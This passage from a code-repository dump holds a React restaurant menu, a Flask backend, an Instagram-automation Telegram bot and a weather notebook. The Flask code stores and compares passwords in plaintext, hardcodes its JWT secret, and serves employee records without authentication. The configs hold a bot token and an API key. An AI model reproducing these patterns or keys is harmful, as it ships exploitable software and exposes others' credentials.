'/dinner'>\n <a className=\"menu-item\" href=\"/dinner\">\n Dinner\n </a>\n </Link>\n \n \n \n <Link to = \"/beverages\">\n <a className=\"menu-item\" href=\"/beverages\">\n Beverages\n </a>\n </Link>\n \n <Link to = \"/specials\">\n <a className=\"menu-item\" href=\"/specials\">\n Specials\n </a>\n </Link>\n \n </Menu>\n );\n};" }, { "alpha_fraction": 0.5950621962547302, "alphanum_fraction": 0.6098366975784302, "avg_line_length": 30.175758361816406, "blob_id": "85b1e59ab086f009bc76941073608b762eae642c", "content_id": "df2cbef0f5697aa5a09524d874d146f865e2bc7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5144, "license_type": "no_license", "max_line_length": 150, "num_lines": 165, "path": "/flaskapp/app.py", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request, redirect, jsonify, make_response\nfrom flask_mysqldb import MySQL\nfrom functools import wraps\nimport yaml\nimport jwt\nimport datetime\n\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\napp.config['SECRET_KEY'] = 'ThisIsSecretKey'\n\n# Configure DB\nwith open(r'db.yaml') as file:\n db = yaml.load(file, Loader=yaml.FullLoader)\n\n\napp.config['MYSQL_HOST'] = db['mysql_host']\napp.config['MYSQL_USER'] = db['mysql_user']\napp.config['MYSQL_PASSWORD'] = db['mysql_password']\napp.config['MYSQL_DB'] = db['mysql_db']\n\nmysql = MySQL(app)\n\n\[email protected]('/')\ndef home():\n return '''<h1>Welcome to Foodinit</h1>'''\n\n# this is for user to sign up\n\n\[email protected]('/signup', methods=[\"POST\", \"GET\"])\ndef signUp():\n if request.method == \"POST\":\n userInfo = request.form\n first_name = userInfo['fname']\n last_name = userInfo['lname']\n email = userInfo['email']\n password = userInfo['password']\n\n print('email')\n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO Customer(first_name, last_name, phone, funds, total_spendings, email_id, pass) VALUES (%s, %s, %s, %s, %s, %s, %s )\",\n (first_name, last_name, '6315528120', '50.00', '0.00', email, password))\n mysql.connection.commit()\n cur.close()\n return redirect('http://localhost:3000')\n return render_template('index.html')\n\n\n# this is for user to sign in\[email protected]('/signin', methods=[\"GET\", \"POST\"])\ndef signIn():\n if 
request.method == \"POST\":\n        userInfo = request.form\n        email = userInfo[\"email\"]\n        password = userInfo[\"password\"]\n\n        cur = mysql.connection.cursor()\n        resultSet = cur.execute(\n            \"SELECT 1 FROM Customer WHERE email_id = %s AND pass = %s\", (email, password))\n\n        if resultSet == 0:\n            return redirect('http://localhost:3000/signin')\n        return redirect('http://localhost:3000/menu')\n        # return jsonify(\"Successfully logged in\")\n\n\ndef token_required(f):\n    @wraps(f)\n    def decorated(*args, **kwargs):\n        # it will be something like http://localhost:5000/route?token=sdkjfvhbksdfhIUYHRASDKFCBD\n        token = request.args.get('token')\n\n        if not token:\n            return jsonify({'Message': \"Token is missing\"}), 403\n        try:\n            data = jwt.decode(token, app.config['SECRET_KEY'])\n        except Exception:\n            return jsonify({'Message': \"Token is invalid\"}), 403\n\n        return f(*args, **kwargs)\n    return decorated\n\n\n# this is for manager to login\[email protected]('/admin', methods=[\"POST\", \"GET\"])\ndef admin():\n\n    if request.method == \"POST\":\n        email = request.form.get(\"email\")\n        password = request.form.get(\"password\")\n\n        cur = mysql.connection.cursor()\n        resultSet = cur.execute(\n            \"SELECT 1 FROM Manager WHERE manager_email = %s AND manager_password = %s\", (email, password))\n\n        if resultSet == 0:  # no match found with the given email and password\n            return redirect('http://localhost:3000/admin')\n        # match found, so issue a valid token\n        token = jwt.encode({'user': email, 'exp': datetime.datetime.utcnow(\n        ) + datetime.timedelta(seconds=120)}, app.config['SECRET_KEY'])\n        return jsonify({'token': token.decode('UTF-8')})\n    return make_response('Could not verify!', 401, {'WWW-Authenticate': 'Basic realm = \"Login Required\"'})\n\n\[email protected]('/getemployeerecords', methods=[\"GET\"])\ndef getEmployeeRecords():\n    cur = mysql.connection.cursor()\n    allEmployeeRecords = []\n\n    cur.execute(\"SELECT * FROM Employee\")\n    row = cur.fetchone()\n    while row is not None:\n        allEmployeeRecords.append(row)\n        row = cur.fetchone()\n\n    return jsonify(allEmployeeRecords)\n\n\n# ---------------------------------------------------------------\n# SOME PRACTICE THINGS DON\"T WORRY ABOUT IT\n# (these routes reuse the token_required decorator defined above)\n\[email protected]('/unprotected')\ndef unprotected():\n    return jsonify('Anyone can view this')\n\n\[email protected]('/protected')\n@token_required\ndef protected():\n    return jsonify('This is sensitive information, only authorized person can view this')\n\n\[email protected]('/login')\ndef login():\n    auth = request.authorization\n\n    if auth and auth.password == 'password':\n        token = jwt.encode({'user': auth.username, 'exp': datetime.datetime.utcnow(\n        ) + datetime.timedelta(seconds=60)}, app.config['SECRET_KEY'])\n        return jsonify({'token': token.decode('UTF-8')})\n    return make_response('Could not verify!', 401, {'WWW-Authenticate': 'Basic realm = \"Login Required\"'})\n\n\nif __name__ == '__main__':\n    app.run(host='localhost', port=5000)\n" }, { "alpha_fraction": 0.39293763041496277, "alphanum_fraction": 0.40758827328681946, "avg_line_length": 25.88888931274414, "blob_id": 
"ccea8964cb77f7519e679c633b68a2a3281555f8", "content_id": "3b4e4043b431dfb431109963dedae8d8f954cb5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2662, "license_type": "no_license", "max_line_length": 65, "num_lines": 99, "path": "/src/components/Dinner.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react'\nimport FoodProfile from './FoodProfile'\nimport Brussels_sprout from './../images/Brussels_sprout.jpg'\nimport Caeser_salad from './../images/Caeser_salad.jpg'\nimport Calamari from './../images/Calamari.jpg'\nimport Cauliflower_steak from './../images/Cauliflower_steak.jpg'\nimport Fettuccine_clams from './../images/Fettuccine_clams.jpg'\nimport Lobster_soup from './../images/Lobster_soup.jpg'\nimport Truffle_gnocchi from './../images/Truffle_gnocchi.jpg'\nimport Veal_meatball from './../images/Veal_meatball.png'\nimport Yellowfin_tuna from './../images/Yellowfin_tuna.jpg'\n\nfunction Dinner() {\n return (\n <div>\n \n <div className=\"row\">\n <div className=\".col-4\">\n <FoodProfile \n imgUrl = {Brussels_sprout} \n name = \"Brussels Sprout\"\n price = \"$18.50\"\n />\n <br />\n <br />\n \n <FoodProfile \n imgUrl = {Caeser_salad}\n name = \" Caeser Salad\"\n price = \"$19.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Calamari}\n name = \" Calamari\"\n price = \"$19.75\"\n />\n\n\n </div>\n <div className=\".col-4\">\n <br></br>\n \n <FoodProfile \n imgUrl = {Cauliflower_steak}\n name = \"Cauliflower Steak\"\n price = \"$19.99\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Fettuccine_clams}\n name = \"Fettuccine Clams\"\n price = \"$25.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Lobster_soup}\n name = \"Lobster Soup\"\n price = \"$29.75\"\n />\n\n </div>\n <div className=\".col-4\">\n <br></br>\n <FoodProfile \n imgUrl = {Truffle_gnocchi}\n name = \"Truffle Gnocchi\"\n price = \"$19.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Veal_meatball}\n name = \" Veal Meatball\"\n price = \"$19.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Yellowfin_tuna}\n name = \"Yellowfin Tuna\"\n price = \"$20.75\"\n />\n\n </div>\n </div>\n </div>\n )\n}\n\nexport default Dinner\n" } ]
16
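A minimal, runnable sketch of the token-guard pattern used in the Flask code in the record above, for reference. It assumes Flask and PyJWT >= 2.x, where `jwt.encode` already returns a `str` (so the original's `.decode('UTF-8')` is only needed on PyJWT 1.x) and `jwt.decode` requires an explicit `algorithms` list. The secret and route names here are placeholders, not part of the original app.

```python
# Token-guard skeleton matching the token_requred() decorator above
# (assumes Flask and PyJWT >= 2.x; secret and routes are placeholders).
import datetime
from functools import wraps

import jwt
from flask import Flask, jsonify, request

app = Flask(__name__)
app.config["SECRET_KEY"] = "change-me"  # placeholder secret


def token_required(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        # e.g. http://localhost:5000/protected?token=<jwt>
        token = request.args.get("token")
        if not token:
            return jsonify({"Message": "Token is missing"}), 403
        try:
            jwt.decode(token, app.config["SECRET_KEY"], algorithms=["HS256"])
        except jwt.PyJWTError:
            return jsonify({"Message": "Token is invalid"}), 403
        return f(*args, **kwargs)
    return decorated


@app.route("/token")
def issue_token():
    # PyJWT 2.x returns a str directly, so no .decode('UTF-8') is needed.
    payload = {"user": "demo",
               "exp": datetime.datetime.utcnow() + datetime.timedelta(seconds=120)}
    return jsonify({"token": jwt.encode(payload, app.config["SECRET_KEY"],
                                        algorithm="HS256")})


@app.route("/protected")
@token_required
def protected():
    return jsonify("authorized")


if __name__ == "__main__":
    app.run(host="localhost", port=5000)
```

Hitting `/protected?token=<value from /token>` succeeds; a missing or expired token yields a 403, mirroring the handlers above.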
rasperepodvipodvert/instabot
https://github.com/rasperepodvipodvert/instabot
0d5597caac02f31a70d126716823b9cc43b7586f
5b1ab9d86165ec32f2d30d55a66498b37de09226
07e5f3adbaa448732aa50242d25f4d18a49b58f2
refs/heads/master
2017-12-03T00:47:28.110936
2017-04-06T19:19:49
2017-04-06T19:19:49
85,699,846
0
0
null
2017-03-21T12:35:51
2017-03-21T11:56:22
2017-03-20T22:11:24
null
[ { "alpha_fraction": 0.6129032373428345, "alphanum_fraction": 0.6236559152603149, "avg_line_length": 30, "blob_id": "ee4297ad595c466777bb8c4a3485057a2f468b3e", "content_id": "b4c59e4bab1583c4960fefb5fe8792ffb5e1aa68", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "permissive", "max_line_length": 52, "num_lines": 3, "path": "/examples/telegram/config.py", "repo_name": "rasperepodvipodvert/instabot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Этот токен невалидный, можете даже не пробовать :)\ntoken = '271487422:AAHKDZDMF3CoDvlrH0p4pd2UhLpXlliC-Ho2'\n" }, { "alpha_fraction": 0.6021671891212463, "alphanum_fraction": 0.6060371398925781, "avg_line_length": 26.489360809326172, "blob_id": "3cbc7a6241ceafe63baef954ecc7dcf67dddd9c3", "content_id": "692513d265071fc49e75b98e83822056a06b9909", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1292, "license_type": "permissive", "max_line_length": 78, "num_lines": 47, "path": "/instabot/bot/bot_support.py", "repo_name": "rasperepodvipodvert/instabot", "src_encoding": "UTF-8", "text": "\"\"\"\n Support instabot's methods.\n\"\"\"\n\nimport sys\nimport os\nimport codecs\n\n\ndef check_if_file_exists(file_path):\n if not os.path.exists(file_path):\n print(\"Can't find '%s' file.\" % file_path)\n return False\n return True\n\n\ndef read_list_from_file(file_path):\n \"\"\"\n Reads list from file. One line - one item.\n Returns the list if file items.\n \"\"\"\n try:\n if not check_if_file_exists(file_path):\n open(file_path,'w').close()\n\n return []\n with codecs.open(file_path, \"r\", encoding=\"utf-8\") as f:\n content = f.readlines()\n if sys.version_info[0] < 3:\n content = [str(item.encode('utf8')) for item in content]\n content = [item.strip() for item in content if len(item) > 0]\n return content\n except Exception as e:\n print(str(e))\n return []\n\n\ndef add_whitelist(self, file_path):\n file_contents = read_list_from_file(file_path)\n self.whitelist = [self.convert_to_user_id(item) for item in file_contents]\n return not not self.whitelist\n\n\ndef add_blacklist(self, file_path):\n file_contents = read_list_from_file(file_path)\n self.blacklist = [self.convert_to_user_id(item) for item in file_contents]\n return not not self.blacklist\n" }, { "alpha_fraction": 0.5003182888031006, "alphanum_fraction": 0.5048897862434387, "avg_line_length": 40.741546630859375, "blob_id": "fdc5a1de0bb7e2bba1246de22002945160c80428", "content_id": "385984dab4ca8e77d929d1e135d242f889b836a1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17314, "license_type": "permissive", "max_line_length": 113, "num_lines": 414, "path": "/examples/telegram/tele_insta_bot.py", "repo_name": "rasperepodvipodvert/instabot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport traceback\nimport time\nimport sys\nimport os\nimport logging\nimport telebot\n\nsys.path.append(os.path.join(sys.path[0], '../../'))\nfrom examples.telegram import config\n\nsys.path.append(os.path.join(sys.path[0], '../../../'))\nfrom instabot import Bot\nfrom instabot.api import prepare\nfrom telebot import types\n\n\ntry:\n iBot = Bot(\n max_likes_per_day=1000,\n max_unlikes_per_day=1000,\n max_follows_per_day=1000,\n max_unfollows_per_day=350,\n max_comments_per_day=100,\n max_likes_to_like=50,\n max_followers_to_follow=500,\n 
min_followers_to_follow=10,\n max_following_to_follow=500,\n min_following_to_follow=10,\n max_followers_to_following_ratio=10,\n max_following_to_followers_ratio=2,\n min_media_count_to_follow=7,\n like_delay=10,\n unlike_delay=10,\n follow_delay=30,\n unfollow_delay=30,\n comment_delay=60,\n blacklist='blacklist.txt'\n ) # new instagram bot exemplar\n bot = telebot.TeleBot(config.token)\n telebot.logger.setLevel(logging.INFO)\n iBot.logger.setLevel(logging.DEBUG)\nexcept Exception as e:\n print('main exec:' + e)\n\n\nclass functions(object):\n queue_of_commands = {}\n mci = 0\n mid = 0\n hashtags_file_name = ''\n hashtags = []\n\n def iBot_login(login):\n try:\n if get_account_from_login(login) is True and iBot.isLoggedIn is False:\n # print(message.text.replace('/',''))\n iBot.login(username=login)\n return True\n else:\n return False\n except Exception as e:\n print(e)\n iBot.logout()\n listaccount()\n return False\n\n def get_user_img_url(username):\n \"\"\"\n Return a URL of profile img INSTAGRAM\n :return: URL\n \"\"\"\n return iBot.get_user_info(username)['hd_profile_pic_url_info']['url']\n\n def get_iBot_status(self):\n '''\n Get last 3 rous from instabot log file\n :return: str\n '''\n try:\n instabot_log_file = \"instabot.log\"\n log = open(instabot_log_file, \"r\").readlines()\n sent = ''\n i = 1\n if log:\n for i in range(3):\n sent = str(sent) + str(log[-i])\n\n return sent\n except Exception as e:\n print(e)\n return ''\n\n def send_iBot_status(self):\n try:\n sent = functions.get_iBot_status(self)\n bot.edit_message_text(chat_id=self.chat.id,\n message_id=self.message_id,\n text=sent,\n reply_markup=functions.keyboards.back_to_main_menu())\n except Exception as e:\n print(e)\n\n def like_hashtags(self):\n try:\n if functions.queue_of_commands.get('Like hashtags', 0) == 0 and len(functions.hashtags) > 0:\n for hashtag in functions.hashtags:\n iBot.like_hashtag(hashtag, amount=3)\n functions.queue_of_commands.pop('Like hashtags')\n else:\n bot.send_message(\n chat_id=self.chat.id,\n text='Nothing to like :(',\n reply_markup=functions.keyboards.like_hashtags())\n except Exception as e:\n print(e)\n\n @staticmethod\n def get_hashtags_from_file(username):\n \"\"\"\n Get hashtags from file username_hashtags.txt\n :return: \n \"\"\"\n functions.hashtags_file_name = '%s_hastags.txt' % iBot.username\n if not os.path.exists(functions.hashtags_file_name):\n open(functions.hashtags_file_name, 'w', encoding='utf8')\n with open(functions.hashtags_file_name, 'r', encoding='utf8') as f:\n for hashtag in f:\n functions.hashtags.append(hashtag.replace('\\n', ''))\n return True\n\n def get_hasgtags_from_user(self):\n \"\"\"\n TESTED!\n :return: ??? 
\n \"\"\"\n try:\n sent = bot.send_message(chat_id=self.chat.id,\n text='Please upload file',\n reply_markup=functions.keyboards.last_10_hashtags(self))\n # bot.register_next_step_handler(sent, functions.iBot_like_hashtags)\n except Exception as e:\n print('iBot_get_hasgtags: ' + e)\n\n class keyboards(object):\n \"\"\"\n This is custom keyboard for reply\n \"\"\"\n\n def last_10_hashtags(self):\n \"\"\"\n TESTED: keyboard for choose hashtags by click\n :return: keyboard\n \"\"\"\n try:\n keyboard = types.InlineKeyboardMarkup()\n if os.path.exists(functions.hashtags_file_name):\n with open(functions.hashtags_file_name, 'r', encoding='utf8') as f:\n for hashtag in f:\n button = types.InlineKeyboardButton(\n text=hashtag.replace('\\n', ''),\n callback_data='like:%s' % hashtag.replace('\\n', ''))\n keyboard.add(button)\n button = types.InlineKeyboardButton(\n text=\"⬅ Back\",\n callback_data='Like_hashtags'\n )\n keyboard.add(button)\n return keyboard\n except Exception as e:\n print('last_10_hashtags: ' + e)\n\n @staticmethod\n def choose_account():\n \"\"\"\n This is main keyboard for choose account for instabot works\n :return: keyboard\n \"\"\"\n keyboard = types.InlineKeyboardMarkup()\n for line in iBot.read_list_from_file(prepare.SECRET_FILE):\n account = line.split(':')[0]\n button = types.InlineKeyboardButton(text=account, callback_data='login:%s' % account)\n keyboard.add(button)\n return keyboard\n\n def main_menu(self):\n \"\"\"\n This is main function keyboard for instabot\n :return: keyboard\n \"\"\"\n try:\n keyboard = types.InlineKeyboardMarkup()\n b_Logout = types.InlineKeyboardButton(text=\"⬅ Back\", callback_data='Logout')\n b_Settings = types.InlineKeyboardButton(text=\"Settings\", callback_data='settings')\n b_BlockBots = types.InlineKeyboardButton(text=\"Block Bots\", callback_data='blockbots')\n\n b_Like_hashtags = types.InlineKeyboardButton(text=\"Like hashtags\", callback_data='Like_hashtags')\n b_Like_followers_of = types.InlineKeyboardButton(text=\"Like followers of\",\n callback_data='Like_followers_of')\n b_Like_following_of = types.InlineKeyboardButton(text=\"Like following of\",\n callback_data='Like_following_of')\n b_Like_your_timeline_feed = types.InlineKeyboardButton(text=\"Like your timeline feed\",\n callback_data='Like_your_timeline_feed')\n\n b_Follow_users_by_hashtags = types.InlineKeyboardButton(text=\"Follow users by hashtags\",\n callback_data='Follow_users_by_hashtags')\n keyboard.add(b_Logout, b_Settings)\n keyboard.add(b_Like_hashtags, b_BlockBots, b_Like_your_timeline_feed)\n\n return keyboard\n\n except Exception as e:\n bot.send_message(self.chat.id, e)\n\n @staticmethod\n def back_to_main_menu():\n \"\"\"\n This is menu for back to main menu\n :return: \n \"\"\"\n keyboard = types.InlineKeyboardMarkup()\n b_Back_to_menu = types.InlineKeyboardButton(text=\"⬅ Back\", callback_data='go_to_menu')\n b_send_status = types.InlineKeyboardButton(text=\"Status\", callback_data='status')\n keyboard.add(b_Back_to_menu, b_send_status)\n return keyboard\n\n @staticmethod\n def like_hashtags():\n keyboard = types.InlineKeyboardMarkup()\n b_Back_to_menu = types.InlineKeyboardButton(text=\"⬅ Back\", callback_data='go_to_menu')\n b_start_like = types.InlineKeyboardButton(text=\"Start Like\", callback_data='start_like')\n b_get_hashtags = types.InlineKeyboardButton(text=\"Enter hashtags\", callback_data='get_hashtags')\n keyboard.add(b_Back_to_menu, b_start_like)\n keyboard.add(b_get_hashtags)\n return keyboard\n\n pass\n\n class queue(object):\n list = 
[]\n\n\[email protected]_handler(commands=['listaccount', 'start'])\ndef listaccount(message):\n try:\n functions.mci = message.chat.id\n if iBot.isLoggedIn is False:\n sent = 'MENU:\\n' \\\n ''\n bot.send_message(chat_id=functions.mci,\n text=sent,\n reply_markup=functions.keyboards.choose_account())\n except Exception as e:\n bot.send_message(functions.mci, e)\n\n\ndef get_account_from_login(login):\n try:\n accounts = iBot.read_list_from_file(prepare.SECRET_FILE)\n for line in accounts:\n username = line.split(':')[0]\n if username == login:\n return True\n exit()\n return False\n except Exception as e:\n bot.send_message(message.chat.id, e)\n\n\[email protected]_query_handler(func=lambda call: True)\ndef callback_inline(call):\n # Если сообщение из чата с ботом\n if call.message and iBot.isLoggedIn:\n print(call.data)\n if call.data == \"Logout\":\n if iBot.logout():\n bot.answer_callback_query(\n callback_query_id=call.id,\n show_alert=False,\n text='Bot is logout! \\n Please choose account...'\n )\n time.sleep(2)\n listaccount(call.message)\n if call.data == \"settings\":\n sent = 'max_likes_per_day = %s \\n ' \\\n 'max_unlikes_per_day = %s\\n' \\\n 'max_follows_per_day = %s\\n' \\\n 'max_unfollows_per_day = %s\\n' \\\n 'max_comments_per_day = %s\\n' \\\n 'max_likes_to_like = %s\\n' \\\n 'max_followers_to_follow = %s\\n' \\\n 'min_followers_to_follow = %s\\n' \\\n 'max_following_to_follow = %s\\n' \\\n 'min_following_to_follow = %s\\n' \\\n 'max_followers_to_following_ratio = %s\\n' \\\n 'max_following_to_followers_ratio = %s\\n' \\\n 'min_media_count_to_follow = %s\\n' \\\n 'like_delay = %s\\n' \\\n 'unlike_delay = %s\\n' \\\n 'follow_delay = %s\\n' \\\n 'unfollow_delay = %s\\n' \\\n 'comment_delay = %s\\n' \\\n 'stop_words = %s\\n' % (iBot.max_likes_per_day,\n iBot.max_unlikes_per_day,\n iBot.max_follows_per_day,\n iBot.max_unfollows_per_day,\n iBot.max_comments_per_day,\n iBot.max_likes_to_like,\n iBot.max_followers_to_follow,\n iBot.min_followers_to_follow,\n iBot.max_following_to_follow,\n iBot.min_following_to_follow,\n iBot.max_followers_to_following_ratio,\n iBot.max_following_to_followers_ratio,\n iBot.min_media_count_to_follow,\n iBot.like_delay,\n iBot.unlike_delay,\n iBot.follow_delay,\n iBot.unfollow_delay,\n iBot.comment_delay,\n str(iBot.stop_words))\n bot.edit_message_text(\n chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=sent,\n reply_markup=functions.keyboards.back_to_main_menu()\n )\n if call.data == \"blockbots\":\n functions.queue_of_commands.append(call.data)\n bot.edit_message_text(chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=str(functions.queue_of_commands),\n reply_markup=functions.keyboards.main_menu(call.message))\n iBot.block_bots()\n functions.queue_of_commands.remove(call.data)\n bot.edit_message_text(chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=str(functions.queue_of_commands),\n reply_markup=functions.keyboards.main_menu(call.message))\n if call.data == \"Like_your_timeline_feed\":\n functions.queue_of_commands.append(call.data)\n bot.edit_message_text(chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=str(functions.queue_of_commands),\n reply_markup=functions.keyboards.main_menu(call.message))\n iBot.like_timeline()\n functions.queue_of_commands.remove(call.data)\n bot.edit_message_text(chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=str(functions.queue_of_commands) + '\\n' + functions.get_iBot_status(),\n 
reply_markup=functions.keyboards.main_menu(call.message))\n if call.data == \"Like_hashtags\":\n functions.mci = call.message.message_id # may be used...\n bot.send_message(\n chat_id=call.message.chat.id,\n text=functions.get_iBot_status(call.message) + str(functions.hashtags),\n reply_markup=functions.keyboards.like_hashtags()\n )\n if call.data.split(':')[0] == 'like': # for hashtags from file\n hashtag = call.data.split(':')[1]\n functions.hashtags.append(hashtag)\n print(functions.hashtags)\n bot.edit_message_text(chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text='Please enter hasshtags: ' + str(functions.hashtags),\n reply_markup=functions.keyboards.last_10_hashtags(call.message))\n if call.data == 'get_hashtags': functions.get_hasgtags_from_user(call.message)\n if call.data == 'start_like': functions.like_hashtags(call.message)\n if call.data == \"go_to_menu\":\n bot.edit_message_text(\n chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=\"MENU:\",\n reply_markup=functions.keyboards.main_menu(call.message)\n )\n if call.data == 'status': functions.send_iBot_status(call.message)\n\n elif call.message and (call.message.chat.id > 0):\n if call.data.split(':')[0] == \"login\": # do after login\n username = call.data.split(':')[1]\n if functions.iBot_login(username):\n functions.get_hashtags_from_file(username)\n sent = '%s\\n%s' % (\n str(iBot.username).upper(),\n functions.get_user_img_url(username)\n )\n bot.edit_message_text(\n chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=sent,\n reply_markup=functions.keyboards.main_menu(call.message)\n )\n else:\n bot.send_message(chat_id=call.message.chat.id,\n text='Please, login first!',\n reply_markup=functions.keyboards.choose_account())\n\n\ndef telegram_polling():\n try:\n bot.polling(none_stop=True, timeout=60) # constantly get messages from Telegram\n except:\n traceback_error_string = traceback.format_exc()\n print(traceback_error_string)\n # with open(\"Error.Log\", \"a\") as myfile:\n # myfile.write(\"\\r\\n\\r\\n\" + time.strftime(\n # \"%c\") + \"\\r\\n<<ERROR polling>>\\r\\n\" + traceback_error_string + \"\\r\\n<<ERROR polling>>\")\n bot.stop_polling()\n time.sleep(10)\n telegram_polling()\n\n\nif __name__ == '__main__':\n telegram_polling()\n" } ]
3
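The Telegram bot in the record above is built around `telebot` inline keyboards plus a catch-all callback handler that routes on `action:value` callback data. A stripped-down sketch of that pattern, assuming the pyTelegramBotAPI package; the token is a placeholder and `login:demo` mimics the `login:<account>` convention used above.

```python
# Inline-keyboard + callback pattern from tele_insta_bot.py, reduced to
# its skeleton (assumes pyTelegramBotAPI; the token is a placeholder).
import telebot
from telebot import types

bot = telebot.TeleBot("123456:PLACEHOLDER-TOKEN")


@bot.message_handler(commands=["start"])
def start(message):
    keyboard = types.InlineKeyboardMarkup()
    keyboard.add(types.InlineKeyboardButton(text="demo",
                                            callback_data="login:demo"))
    bot.send_message(message.chat.id, "Choose an account:",
                     reply_markup=keyboard)


@bot.callback_query_handler(func=lambda call: True)
def on_callback(call):
    # callback_data is routed on an "action:value" convention, as above
    action, _, value = call.data.partition(":")
    if action == "login":
        # answer_callback_query stops the client-side spinner
        bot.answer_callback_query(call.id, text="Logging in as %s" % value)
        bot.edit_message_text(chat_id=call.message.chat.id,
                              message_id=call.message.message_id,
                              text="Logged in as %s" % value)


if __name__ == "__main__":
    bot.polling(none_stop=True)
```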
aidinhass/weatherpy
https://github.com/aidinhass/weatherpy
cd1f40213c4f6fd2381fda5337a2d77a08ee289c
6eff0531bc5c6919ec06f1b5dd3478a4d9ade68f
36407877461526649eccea3ecd8cf596a11ff78f
refs/heads/master
2020-03-18T16:01:04.507557
2018-06-26T00:25:14
2018-06-26T00:25:14
134,942,368
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5, "alphanum_fraction": 0.5, "avg_line_length": 17, "blob_id": "2b475aa6176e704ac359dfb4bb0dc6ceed53d398", "content_id": "833662a8c6a445f61c4da81eec532435f308b7f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18, "license_type": "no_license", "max_line_length": 17, "num_lines": 1, "path": "/config.py", "repo_name": "aidinhass/weatherpy", "src_encoding": "UTF-8", "text": "api_key = \"cf48ed22aed78ca5359adb43dcdbbd2b\"\n" }, { "alpha_fraction": 0.5281491279602051, "alphanum_fraction": 0.5633859634399414, "avg_line_length": 23.39678192138672, "blob_id": "65ce262b8acdddb5a66876b51d1987e8af2b2975", "content_id": "cea0b9ac43922bfcc764bf2d75bda096a45d5223", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 27301, "license_type": "no_license", "max_line_length": 404, "num_lines": 1119, "path": "/notebooks/README.md", "repo_name": "aidinhass/weatherpy", "src_encoding": "UTF-8", "text": "\n## 1. Insights\n\nThe climatic variations as a function of geograpy are being investigated through 2-d scatter and climatic geomap plots. This involves analyzing the association beween four basic climatic factors including temperature, humidity, cloudiness and wind speed with respect to latitude and latitude-longitude.\n\n### 1.1. Climate and Latitude\n### 1.1.1. Temperature (F) vs. Latitude\nInvestigating temperature at different latitudes shows:\n- There exists a negative association between temperature and distance from equator. Temperature smoothly falls off with latitude towards the two poles. The regions close to the equator experience higher temperatures compared to those close to the North and South poles.\n\n### 1.1.2. Humidity (F) vs. Latitude\nInvestigating humidity at different latitudes shows:\n- There exists a weak negative association between the temperature and the distance from equator. As one moves away from the equator, the humidity decreases .\n\n### 1.1.3. Cloudiness (F) vs. Latitude\nInvestigating the cloudiness at different latitude shows:\nTher is no clear association with latitude.\n\n### 1.1.4. Wind Speed vs (Total Drivers vs Total Rides)\nInvestigating the wind speed at different latitudes shows:\n- There exist a weak positive association between wind speed and distance from equator.\n\n### 1.2. Climate and Latitude-Longitude\nTBA\n\n## 2. Limitations\n\n- The current analysis has heavily focused on temperature records sampled at cities across the world that can easily influenced by the non-unfiormity of city distributions. As the land masses are distributed predominantly in the Northern Hemisphere (68%) compared to the Southern Hemisphere (32%), it is quite likely that more cities are located in Northern hemisphere compared to the Sothern Hemisphere.\n- The climatic variation has only been assessed with respect to latitude while ingnorng other plusible governing factors. It is well know that any climatic phenomenon depends on other factors such as altitude and local topgrapy and clearly, an accurate climatic analysis can be achieved as any potential factor being accounted for global level climatic variations is considered. \n\n## 3. Implementation\n\n### 3.1. 
Import Dependecies\n\n\n```python\n# import dependecies\n%matplotlib inline\nimport os, sys, inspect\nimport time\nimport random\nimport requests\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom mpl_toolkits.basemap import Basemap as bm\nfrom itertools import product\nfrom citipy import citipy as cp\nfrom pprint import pprint\n\n# add parent dir to system dir\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nroot_dir = os.path.dirname(current_dir)\nsys.path.insert(0, root_dir) \n```\n\n### 3.2. Import API keys\n\n\n```python\n# OpenWeatherMap api key\nfrom config import api_key\n```\n\n### 3.3. Set global varriables\n\n\n```python\nDEGREE = u\"\\u00b0\"\n```\n\n### 3.4. Define functions\n\n\n```python\ndef scatter(\n x, y,\n marker=\"o\",\n markersize=6,\n markeredgecolor=\"black\",\n markeredgewidth=1,\n markerfacecolor=\"black\",\n fillstyle=\"full\",\n linestyle=\"\",\n alpha=.7,\n xlabel=\"\",\n ylabel=\"\",\n label=\"\",\n title=\"\",\n xlim=None,\n ylim=None,\n fontsize_title=14,\n fontsize_label=13,\n fontsize_xtick=12,\n fontsize_ytick=12,\n figsize=(7, 5),\n legend=True,\n grid=True,\n ax=None,):\n \"\"\"Scatter plot given input 'x' and 'y'. Wrapper function to interface 'matplotlib.pyplot.plot'\n to perform scatter plot.\n \"\"\"\n \n # create figure/axis handler\n if ax is None:\n fig = 